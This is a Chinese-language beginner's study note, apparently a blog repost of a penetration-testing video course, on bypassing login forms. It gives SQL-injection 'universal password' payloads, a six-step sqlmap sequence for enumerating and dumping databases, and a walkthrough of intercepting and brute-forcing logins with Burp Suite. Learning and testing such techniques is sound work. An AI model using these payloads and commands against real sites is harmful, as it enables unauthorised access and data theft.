小白学渗透,超详细教程笔记~《绕过密码登录》原视频bilibili的2019超详细 渗透测试/黑客入门/漏洞学习视频教程!!!是个系列教程哦~
作者:互联网
探测顺序:(注入六连)
1、Sqlmap -uhttp://www.xx.com?id=x(查询是否存在注入点)
2、--dbs(检测站点包含哪些数据库)
3、--current -db(获取当前的数据库名)
4、--tables -D”db_name”获取指定数据库中的表名(-D后 接指定的数据库名称)
5、--columns -T”table_name” -D ”db_name”(获取数据库表中的字段)
6、--dump-C”columns_name”-T ”table_name”-D “db_name”(获取字段的数据内容)
一、在用户栏输入:’用户名’or 1=1--。进入MySQL界面,可以看到password是多少
|
->从用户框输入:’用户名’or 1=1 -- |
(1) 常用的万能密码:’or’=’ or’ 、’or 1=1-- 、’or 1=1/*;
(2) 登录SQL的语句:select *from admin where username =’用户输入的用户名’ and password=’用户输入的密码’;
(3) SQL语句:select *from admin where username =’’or 1=1—and password=’用户密码’;
二、渗透
1、用BURP(爆破软件)探测,进行抓包;
2、选择对应测试对象;
3、在BURP设置代理(为了抓包);
点AdvanLed->Network->Setting中第四个->关闭;
4、到BURP菜单栏选options(第二行里)
5、查看是否为登录IP地址的对应网站;
如果原地址有误则出现MySQL报错
|
不报错是:……php?id 1=1 |
6、选Intercept截断(登陆就能显示到抓包);
7、转向网站输入密码:是正确密码直接就进去了,是错误密码就进行抓包、爆破。
8、Intecept中的Raw是抓到的包的数据;
9、把抓到的包进行发送处理:可直接点击Intercept中的Action就能发送到intruder模块了;
10、选intruder->2->Sand to Intrillder
点击Positions中的Attack type:选sniper对包数据内容进行包探测,对密码xxx进行探测。
对密码xxx进行探测
11、在探测完之后的页面,
12、proxy(是代理)下有Intercept;
(1) 源地址有误报错;
(2) 源地址无误不报错;
(3) 不显示内容也报错;
13、演示登陆注入(对登录提交的参数进行抓取、注入)
- 登录后将抓取的数据包copy一下。
- 右键选Open Terminal进入root@kali:(下面的)
- 代码意思:(进入’Desktop’目录)(新建一个’Untitled Decument1’类似文本文档的)
- 将复制于内,Save到(桌面)target.txt ,关闭
用sqlmap对刚抓取的内容进行探测,探测是否存在sql注入漏洞,(username –dbs是探测内容)
探测出的cms注入的命令
中间会问三次是否继续探测(选Y),第四次是是否要测其他,(选N)
Information-scheme是其他数据库
14、演示CMS注入并获取对应数据
- (-dbs是对登录网址进行探测)在探测时可以按回车进行加速操作(在加速操作时电脑自动选择默认)
- 探测cms中的数据库中数据表
- (-D cms -T articles)探测cms中的数据库中的字段
可看到是三个字段:
(-D cms -T articles -C id,title,content --dump)探测当前字段中的具体值
可看到三个字段的对应值:
到此完成使用sqlmap来探测登录框及对应cms(ul)注入并且获得对应数据。
标签:教程,name,密码,渗透,数据库,探测,--,详细,cms 来源: https://www.cnblogs.com/051129-mgzhl/p/16121695.html